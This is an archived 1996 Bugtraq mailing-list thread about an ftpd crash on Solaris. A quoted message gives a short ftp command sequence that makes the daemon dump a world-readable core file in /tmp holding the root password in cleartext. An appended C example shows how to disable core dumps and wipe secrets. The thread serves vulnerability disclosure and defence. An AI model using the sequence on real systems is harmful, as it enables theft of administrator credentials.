
Bugtraq: Re: ftpd bug? Was: bin/1805: Bug in ftpd

From: <gamble_at_dxcoms.cern.ch>
Date: Wed, 16 Oct 1996 10:04:28 +0200

Doesn't work for me ... SunOS 4.1.1

SOMEWHERE>ftp sunos
220 sunos FTP server (SunOS 4.1) ready.
Connected to sunos.xxx.xx.
Name (sunos:smith):
331 Password required for smith.
Password:
230 User smith logged in.
FTP> cd /tmp
250 CWD command successful.
FTP> user root fred
530 User root access denied.
%FTP-E-LOGREJ, Login request rejected
FTP> quote pasv
421 Service not available, Remote server has closed the connection
SOMEWHERE>

and no core in /tmp

John
------------------------------------------ original message

James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
    so they seem to have used the proposed fix

         Checking for "pw != NULL"

    So this proposal was simple and obvious ... and incomplete. :)
Received on Oct 16 1996
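
Added example (not part of either message, and not Sun's ftpd code): one way a daemon that holds passwords in memory can keep a crash like the one discussed above from leaving them in a core file. The helper names `disable_core_dumps`, `core_soft_limit` and `wipe` are hypothetical, the sample password is constructed, and the `prctl` call applies to Linux only.

```c
/* Added example, not code from Sun's ftpd; helper names are hypothetical. */
#include <stdio.h>
#include <sys/resource.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Forbid core files for this process. Returns 0 on success, -1 on error. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };          /* soft and hard limit both 0 bytes */
    if (setrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
#ifdef __linux__
    /* Linux only: also mark the process non-dumpable. */
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
        return -1;
#endif
    return 0;
}

/* Current soft core-size limit in bytes, or -1 on error. */
long core_soft_limit(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
    return (long)rl.rlim_cur;
}

/* Zero a secret through a volatile pointer so the stores are not optimised away. */
void wipe(void *buf, size_t len)
{
    volatile unsigned char *p = buf;
    while (len--)
        *p++ = 0;
}

int main(void)
{
    char pw[32] = "wrongpasswd";          /* constructed sample input */
    if (disable_core_dumps() != 0) {
        perror("disable_core_dumps");
        return 1;
    }
    /* Once the password has been checked it is no longer needed: erase it. */
    wipe(pw, sizeof pw);
    printf("core limit=%ld, pw[0]=%d\n", core_soft_limit(), pw[0]);
    return 0;
}
```

Calling `disable_core_dumps()` before any credential is read matters more than the wipe, since a crash can happen while the secret is still in use.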
